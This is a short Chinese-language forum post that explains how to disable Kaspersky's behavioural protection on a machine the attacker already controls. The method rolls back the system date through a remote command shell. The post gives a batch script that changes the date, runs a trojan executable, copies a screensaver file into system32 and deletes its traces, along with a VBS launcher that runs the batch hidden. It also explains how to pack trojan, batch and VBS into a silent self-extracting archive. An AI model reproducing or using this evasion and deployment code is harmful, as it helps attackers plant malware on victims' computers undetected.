看论坛兄弟还在为卡巴苦恼提供一些方法 知道的闪过即可
第一你已经控制的
在对方的cmdshell下执行以下命令语句：

set date=%date%
date 1987-12-18

再上传木马，我们发现卡吧的行为杀毒已经不起作用了。


第2个方法
第一个批量代码
date 1980-01-01

date 1980-01-01

@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End

:Next
%systemroot%\temp\你的木马名字.exe
copy %systemroot%\temp\tmp.SCR %systemroot%\system32\
fot %%f in (%temp%.\tmp$$$.vbs*) do del %%f

date 2007-2-17(当地时间)

RD /S /Q %systemroot%\temp\

第2个是vbs代码
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C %systemroot%\temp\ser.bat(第一批量文件名字)", 0, TRUE)

把马+BAT文件+VBS文件 压缩成自解压文件 压的时候选高级-自解压选项 解压路径为%systemroot%\temp\ 然后下面解压后运行 写VBS脚本文件的名字 然后选择格式 安静模式选全部隐藏 覆盖方式选全部覆盖 之后 压缩 运行压缩好的文件就会发现 卡巴的主动防御 失效了

好久以前就有了。。。